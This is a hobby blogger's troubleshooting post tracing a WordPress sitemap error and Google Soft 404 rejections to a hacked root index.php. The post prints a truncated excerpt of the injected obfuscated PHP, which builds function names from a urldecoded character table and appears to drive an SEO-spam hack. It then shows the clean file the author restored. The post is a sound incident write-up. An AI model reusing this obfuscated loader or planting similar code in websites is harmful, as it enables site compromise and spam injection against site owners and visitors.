How a Mere XML Sitemap Error Revealed A Shocking Fact
Introduction
An XML Sitemap is required to allow search engines to easily crawl and index your blog. As a full-time network engineer and hobby blogger, I had not much time to build my own sitemap. So, like all blog folks out there, I used plugins to generate it.
This article shows you how a simple XML Sitemap error can hide more that you think.
XML Sitemap error
I got since more than 3 months a weird XML sitemap error message:
XML declaration allowed only at the start of the document

I first thought it was due to the Yoast SEO plugin. Therefore I deactivated the Yoast-generated XML sitemap.

and installed another sitemap plugin which generated a correct (at least to my eyes) XML sitemap.
However, Google search console still flags my blog as Soft 404. I spent whole weekends and vacation days trying to reverse engineer the reason behind this Google rejection.

All articles I read point to “thin content” or “redirecting 404 error” pages.
I was not really convinced.
So I tried something else: I signed out my blog from Adsense and resubmitted my blog. I got a rejection from Google telling me there was something wrong:

Searching for solutions
Searching endlessly in the Internet, I read in StackOverflow forums that there could be a white space slipping in functions.php file:



So I went to all php files of my wordpress theme and searched all before and after white spaces. I also tried the php code I copied from the above mentioned solution into the theme’s index.php. No success.
Then I deactivated all my wordpress plugins except Yoast. I retried to generate the XML sitemap. No success.
With pure coincidence (or maybe good attention to details LOL) I noticed something visually weird in the index.php file under the root folder of my blog web server. When I edit it with Notepad, there are strange characters:
<?php
$O0__OOO0_0='BEGINJ6Pn2HmH0e568SXnR6KRkmP5tQbh7KEW';
$O0_0OO_O0_='granule';
$O__0OOO00_='1000147';
$O0_OO_O0_0=1160;
$O__O0O_00O='/bamboo\/(\d+)_birch_(\d+)\.jsp/is';
$O_0_OO_0O0='bamboo/{G}_birch_{L}.jsp';
$O__OO00O_0=1103;
$O0_0OOO_0_='atlantic.php';
$OOO0__0_0O=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O_OO_00O_0=$OOO0__0_0O{26}.$OOO0__0_0O{6}.$OOO0__0_0O{10}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{26}.$OOO0__0_0O{30}.$OOO0__0_0O{38}.$OOO0__0_0O{6}.$OOO0__0_0O{18}.$OOO0__0_0O{23}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{5}.$OOO0__0_0O{30}.$OOO0__0_0O{2}.$OOO0__0_0O{35}.$OOO0__0_0O{0}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{10};$O__0_0O0OO=$OOO0__0_0O{16}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{27}.$OOO0__0_0O{29}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{16}.$OOO0__0_0O{23}.$OOO0__0_0O{6}.$OOO0__0_0O{32}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{32}.$OOO0__0_0O{6}.$OOO0__0_0O{23}.$OOO0__0_0O{23}.$OOO0__0_0O{3}.$OOO0__0_0O{6}.$OOO0__0_0O{32}.$OOO0__0_0O{25};$O__0_OO00O=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{29}.$OOO0__0_0O{33}.$OOO0__0_0O{35}.$OOO0__0_0O{32}.$OOO0__0_0O{25}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{32}.$OOO0__0_0O{23}.$OOO0__0_0O{12}.$OOO0__0_0O{30}.$OOO0__0_0O{0}.$OOO0__0_0O{10};$O0__0O0OO_=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{29}.$OOO0__0_0O{27}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{5}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{6}.$OOO0__0_0O{29}.$OOO0__0_0O{26}.$OOO0__0_0O{6}.$OOO0__0_0O{10}.$OOO0__0_0O{6};$O0O0_O0__O=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{29}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{3}.$OOO0__0_0O{23}.$OOO0__0_0O{35}.$OOO0__0_0O{32}.$OOO0__0_0O{25}.$OOO0__0_0O{12}.$OOO0__0_0O{0}.$OOO0__0_0O{27};$OO_O0_0O_0=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{29}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{5}.$OOO0__0_0O{30}.$OOO0__0_0O{35}.$OOO0__0_0O{18}.$OOO0__0_0O{10};$O0OO0__0_O=$OOO0__0_0O{12}.$OOO0__0_0O{27}.$OOO0__0_0O{0}.$OOO0__0_0O{35}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{18}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{24}.$OOO0__0_0O{29}.$OOO0__0_0O{6}.$OOO0__0_0O{3}.$OOO0__0_0O{35}.$OOO0__0_0O{24}.$OOO0__0_0O{10};$O0_O__00OO=$OOO0__0_0O{38}.$OOO0__0_0O{12}.$OOO0__0_0O{23}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{16}.$OOO0__0_0O{18}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{32}.$OOO0__0_0O{35}.$OOO0__0_0O{0}.$OOO0__0_0O{10}.$OOO0__0_0O{30}.$OOO0__0_0O{0}.$OOO0__0_0O{10}.$OOO0__0_0O{33};$OO_00__0OO=$OOO0__0_0O{31}.$OOO0__0_0O{10}.$OOO0__0_0O{10}.$OOO0__0_0O{16}.$OOO0__0_0O{29}.$OOO0__0_0O{3}.$OOO0__0_0O{18}.$OOO0__0_0O{12}.$OOO0__0_0O{23}.$OOO0__0_0O{26}.$OOO0__0_0O{29}.$OOO0__0_0O{19}.$OOO0__0_0O{18}.$OOO0__0_0O{30}.$OOO0__0_0O{24}.$OOO0__0_0O{20};$O0_0_O0O_O=$OOO0__0_0O{38}.$OOO0__0_0O{18}.$OOO0__0_0O{0}.$OOO0__0_0O{32}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{35}.$OOO0__0_0O{0}.$OOO0__0_0O{29}.$OOO0__0_0O{30}.$OOO0__0_0O{17}.$OOO0__0_0O{12}.$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{33};$O0O_OO__00=$OOO0__0_0O{32}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{10}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{38}.$OOO0__0_0O{18}.$OOO0__0_0O{0}.$OOO0__0_0O{32}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{35}.$OOO0__0_0O{0};$OO0OO0__0_=$OOO0__0_0O{33}.$OOO0__0_0O{18}.$OOO0__0_0O{3}.$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{29}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{16}.$OOO0__0_0O{23}.$OOO0__0_0O{6}.$OOO0__0_0O{32}.$OOO0__0_0O{30};$OOO__00O_0=$OOO0__0_0O{33}.$OOO0__0_0O{35}.$OOO0__0_0O{32}.$OOO0__0_0O{25}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{32}.$OOO0__0_0O{35}.$OOO0__0_0O{0}.$OOO0__0_0O{0}.$OOO0__0_0O{30}.$OOO0__0_0O{32}.$OOO0__0_0O{10};$O_0O__0O0O=$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{5}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{23}.$OOO0__0_0O{12}.$OOO0__0_0O{5}.$OOO0__0_0O{12}.$OOO0__0_0O{10};$O_00O0O_O_=$OOO0__0_0O{16}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{27}.$OOO0__0_0O{29}.$OOO0__0_0O{5}.$OOO0__0_0O{6}.$OOO0__0_0O{10}.$OOO0__0_0O{32}.$OOO0__0_0O{31}.$OOO0__0_0O{29}.$OOO0__0_0O{6}.$OOO0__0_0O{23}.$OOO0__0_0O{23};$OOOO0_0__0=$OOO0__0_0O{27}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{31}.$OOO0__0_0O{35}.$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{3}.$OOO0__0_0O{20}.$OOO0__0_0O{0}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{30};$O0O__0_OO0=$OOO0__0_0O{3}.$OOO0__0_0O{6}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{22}.$OOO0__0_0O{36}.$OOO0__0_0O{29}.$OOO0__0_0O{26}.$OOO0__0_0O{30}.$OOO0__0_0O{32}.$OOO0__0_0O{35}.$OOO0__0_0O{26}.$OOO0__0_0O{30};$O0O_0O_0O_=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{29}.
Doing a quick Google request to determine the indexation status of my blog, I was shocked to see chinese symbols on my site:


What the fuck are chinese characters doing on my blog?
Then I remembered an incident in last October. I once received a notification from Google Webmaster Console that someone was added as a property owner:

Since I was in public transport on the way to work (and I have no time during the day for blogging), I could not do anything until late that evening. I removed a weird TXT file from the root of the server and changed my passwords. I thought I solved the issue and that I defeated the hacker.
Wrong! Now I am convinced that my blog was hacked and left with hidden anomalies!
First instinct was to back this file up, delete the “alien” characters and have a clean index.php file again:
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
I generated the Yoast XML Sitemap file again. Bingo!

And Google is now happy with my new results (it is in German below. It means “indexation is requested”):

Conclusion
In my case, the solution to the error “xml declaration allowed only at the start of the document” was to repair a corrupted index.php file. I don’t know how I missed this thing. Maybe I need to consider a course on WordPress security.
References
- https://github.com/Yoast/wordpress-seo/issues/7105
- https://yoast.com/help/how-to-check-for-plugin-conflicts/
- https://stackoverflow.com/questions/5479533/problem-xml-declaration-allowed-only-at-the-start-of-the-document
- https://stackoverflow.com/questions/14685893/xml-declaration-allowed-only-at-the-start-of-the-document
- https://www.searchenginejournal.com/google-search-console-index-coverage-report-guide/346514/
- https://support.google.com/webmasters/answer/181708?
- https://www.reliablesoft.net/soft-404/
- https://www.hallaminternet.com/what-are-soft-404-errors-will-they-affect-rankings/
- https://seo-radio.de/google-behandelt-ausverkaufte-produktseiten-als-soft-404/
- https://pepperlandmarketing.com/blog/fix-soft-404-errors/
- https://forum.webflow.com/t/submitted-url-seems-to-be-a-soft-404/53674
Comments
Post a Comment